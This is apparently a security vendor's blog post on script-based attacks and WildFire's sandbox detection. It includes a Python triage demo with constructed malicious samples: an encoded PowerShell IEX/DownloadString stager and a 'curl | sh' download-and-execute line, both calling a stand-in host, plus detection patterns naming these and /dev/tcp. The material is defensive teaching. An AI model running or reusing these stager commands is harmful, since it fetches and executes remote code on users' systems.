Cyberattackers look for fast and easy ways to steal your data. Among the many techniques in their playbooks, the use of scripts is a quickly growing trend. Why? Because:
Scripts are easier to obfuscate than a compiled PE (portable executable)
Scripts are harder to detect by file type or syntax (a script is merely a text file)
Scripts run across platforms and OS versions (no need to recompile for Windows 7, XP, etc.)
Scripts are easier to generate (a simple text change instead of a compilation step)
Scripting languages are easier to learn than compiled programming languages
Scripting is an extremely useful toolset. It gives administrators and power users a way to automate repetitive tasks and multitask effectively. If you have ever opened a Microsoft Office file, you have probably encountered "macros", which are written in VBA (Visual Basic for Applications) and execute when the document is opened. These tools accelerate productivity, but they can also serve a darker purpose. Adversaries leverage scripting languages to download and execute further code, exploit vulnerabilities in the system, and potentially gain privileged access.
Attackers are continuously finding clever new ways to hide these malicious scripts in seemingly safe content. For example, they can place them in password-protected archives (.ZIP, .RAR) that a scanner cannot open, or embed them in commonly used Windows PE (executable) files and documents, successfully evading legacy sandboxing tools. In most cases, attackers use social engineering to build emails that deliver the script while appearing to come from a trusted source within the company, increasing the chances of an employee engaging with it.
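The points above (a script is plain text that cannot be classified by extension, it is trivially obfuscated, and it may arrive inside a password-protected archive) can be exercised with a small content-based triage routine. The following is an added illustration written for this page, not code from Palo Alto Networks or WildFire. The script samples, the archive, and the indicator patterns are all constructed for the demo; the patterns are a handful of heuristics, not a vendor signature set, and the "encrypted" archive is faked by setting the encryption bit in an ordinary zip so the reader can see how a scanner must treat such entries as opaque.

```python
"""Content-based script triage: classify by what the bytes do, not by the file extension."""
import base64
import io
import re
import zipfile

# PowerShell's -EncodedCommand (-enc, -e) takes base64 of the UTF-16LE command text.
ENC_CMD_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Constructed indicator set (not a vendor signature set): stagers that fetch and run more code.
INDICATORS = {
    "powershell": [r"Invoke-Expression|\bIEX\b", r"DownloadString|DownloadFile|Invoke-WebRequest",
                   r"-w(?:indowstyle)?\s+hidden", r"-nop\b|-noprofile"],
    "shell": [r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b", r"\bbase64\s+(-d|--decode)", r"/dev/tcp/"],
}

# Constructed samples (no real malware). Note the misleading extensions on the first two.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
SAMPLES = {
    "invoice.txt": b"powershell -nop -w hidden -EncodedCommand "
                   + base64.b64encode(_STAGER.encode("utf-16le")),
    "setup.sh": b"#!/bin/sh\ncurl -s http://example.invalid/x | sh\n",
    "readme.md": b"# Release notes\nNothing to see here.\n",
}


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_CMD_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def identify_script(data):
    """Guess the script language from content alone; the file name is deliberately ignored."""
    text = data.decode("utf-8", errors="replace")
    if text.startswith("#!") and re.search(r"^#!.*\b(ba|z|da|k)?sh\b", text):
        return "shell"
    if re.search(r"powershell(\.exe)?\b|\$\w+\s*=|Invoke-\w+|New-Object\b", text, re.IGNORECASE):
        return "powershell"
    if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", text):
        return "shell"
    return None


def triage(data):
    """Return (language, decoded -EncodedCommand payload or None, list of matched indicators)."""
    lang = identify_script(data)
    if lang is None:
        return None, None, []
    text = data.decode("utf-8", errors="replace")
    decoded = decode_encoded_command(text) if lang == "powershell" else None
    # Match indicators against the de-obfuscated text too, or the encoded stager hides everything.
    haystack = text + ("\n" + decoded if decoded else "")
    hits = [p for p in INDICATORS[lang] if re.search(p, haystack, re.IGNORECASE)]
    return lang, decoded, hits


def scan_archive(zip_bytes):
    """Triage every archive member. Encrypted members cannot be read without the password,
    so they are reported as opaque rather than silently passed as clean."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.flag_bits & 0x1:  # general-purpose bit 0: entry is encrypted
                results[info.filename] = ("encrypted", None, [])
            else:
                results[info.filename] = triage(zf.read(info))
    return results


def build_sample_archive(encrypted=False):
    """Constructed zip of the samples above. encrypted=True fakes password protection by
    setting bit 0 of the general-purpose flag in each local and central header (demo only;
    the member bytes stay in the clear, but a scanner honouring the flag will not read them)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in SAMPLES.items():
            zf.writestr(name, data)
    raw = bytearray(buf.getvalue())
    if encrypted:
        for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            i = raw.find(sig)
            while i != -1:
                raw[i + off] |= 0x01
                i = raw.find(sig, i + 4)
    return bytes(raw)


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, triage(data))
    print(scan_archive(build_sample_archive(encrypted=True)))
```

Running it shows invoice.txt classified as PowerShell with four indicators hit only after the base64/UTF-16LE payload is decoded, setup.sh flagged as a shell download-and-execute stager, and every member of the password-protected archive reported as "encrypted" with no verdict, which is exactly the gap that has to be closed by detonating the archive with the password (or blocking it) rather than by static scanning alone.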
How WildFire Protects
The Palo Alto Networks WildFire malware analysis service has added a new detection technique to mitigate script-based attacks. When scripts are identified traversing the network, our Security Operating Platform immediately identifies and forwards the files to WildFire for analysis and execution. To reveal even the most evasive advanced attacks, WildFire combines multiple techniques, including static analysis and dynamic analysis (detonating the script in a sandbox), to identify its true intent. Once a verdict is determined, protections are shared with the global community within minutes, spreading immunity worldwide.
WildFire now supports the following script file types:
PowerShell Script (.ps1)
Shell Script (.sh)
and inspects them when delivered over the email protocols POP3, SMTP and IMAP.
For example, a user receives a malicious script via email and executes it. WildFire receives and analyzes the script, then delivers domain signatures and URL recategorization that block the secondary malicious payloads the script tries to fetch. Here is a visual representation of the lifecycle:
The next step is to determine the purpose, and the potentially targeted nature, of the attack. The Palo Alto Networks AutoFocus threat intelligence service provides rich context and attribution: you get instant access to billions of public samples and trillions of artifacts collected and processed by the WildFire global infrastructure. Security analysts can quickly assess potential impact by combining Unit 42 human intelligence with automated analysis. As a result, you have fast access to the right data, can be more proactive, and can respond to future script-based attacks faster.
The Palo Alto Networks Unit 42 threat research team has discovered and dissected several adversary playbooks that use scripts at multiple stages of the attack lifecycle, providing insight into how adversaries employ this technique in the real world: